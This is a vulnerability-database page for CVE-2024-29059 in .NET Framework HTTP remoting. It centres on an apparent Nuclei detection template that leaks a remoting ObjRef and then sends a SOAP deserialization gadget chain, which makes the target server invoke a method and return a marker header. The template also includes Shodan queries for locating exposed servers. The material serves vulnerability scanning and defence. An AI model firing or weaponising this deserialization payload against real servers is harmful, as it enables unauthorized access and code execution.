| Reporter | Title | Published | Views | Family All 38 |
|---|---|---|---|---|
| CVE-2024-29059 | 23 Mar 202400:00 | – | attackerkb | |
| The vulnerability of the Microsoft .NET Framework software platform, related to insufficient protection of operational data, allows a perpetrator to gain unauthorized access to protected information. | 27 Mar 202400:00 | – | bdu_fstec | |
| CVE-2024-29059 | 25 Mar 202413:00 | – | circl | |
| Microsoft .NET Framework Information Disclosure Vulnerability | 4 Feb 202500:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 4 Feb 202512:00 | – | cisa | |
| Microsoft .NET Framework 安全漏洞 | 22 Mar 202400:00 | – | cnnvd | |
| CVE-2024-29059 | 22 Mar 202423:09 | – | cve | |
| CVE-2024-29059 .NET Framework Information Disclosure Vulnerability | 22 Mar 202423:09 | – | cvelist | |
| Exploit for Generation of Error Message Containing Sensitive Information in Microsoft | 11 Mar 202410:14 | – | githubexploit | |
| U.S. Dept Of Defense: [███] .NET Framework ObjRefs Disclosure (CVE-2024-29059) | 19 Apr 202415:48 | – | hackerone |
id: CVE-2024-29059
info:
name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
severity: high
description: .NET Framework Information Disclosure Vulnerability
impact: |
Attackers can exploit leaked ObjRefs to access remote objects via .NET Remoting, potentially gaining unauthorized access to application data.
remediation: |
Apply security patches for .NET Framework addressing CVE-2024-29059.
reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
- https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
- https://github.com/codewhitesec/HttpRemotingObjRefLeak
- https://github.com/NaInSec/CVE-LIST
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-29059
cwe-id: CWE-209
epss-score: 0.98624
epss-percentile: 0.99917
cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: microsoft
product: .net_framework
shodan-query:
- 'Server: MS .NET Remoting'
- "server: ms .net remoting"
tags: cve,cve2024,dotnet,microsoft,remoting,deserialization,kev,vkev,vuln
http:
- raw:
- |
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
Host: {{Hostname}}
__RequestVerb: POST
Content-Type: text/xml
- |
POST {{objref}} HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
<ForegroundBrush id="ref-3"><ObjectDataProvider MethodName="AddHeader"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:System="clr-namespace:System;assembly=mscorlib"
xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance>
<ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>
</ObjectDataProvider.ObjectInstance>
<ObjectDataProvider.MethodParameters>
<System:String>X-Vuln-Test</System:String>
<System:String>{{randstr}}</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider></ForegroundBrush>
</a1:TextFormattingRunProperties>
</SOAP-ENV:Envelope>
extractors:
- type: regex
name: objref
part: body_1
group: 1
regex:
- "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
internal: true
- type: dsl
dsl:
- x_vuln_test
matchers:
- type: dsl
dsl:
- "contains(body_1,'ObjRef')"
- "contains(x_vuln_test,'{{randstr}}')"
condition: and
# digest: 4a0a004730450220771f82322fde9f10f3c220451512dd88c5cf183d133ba42641090151ff104474022100830393661e156141b8bb6a4e925524e2cf53bcad8fbffacb17eecfe8e2a03c56:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation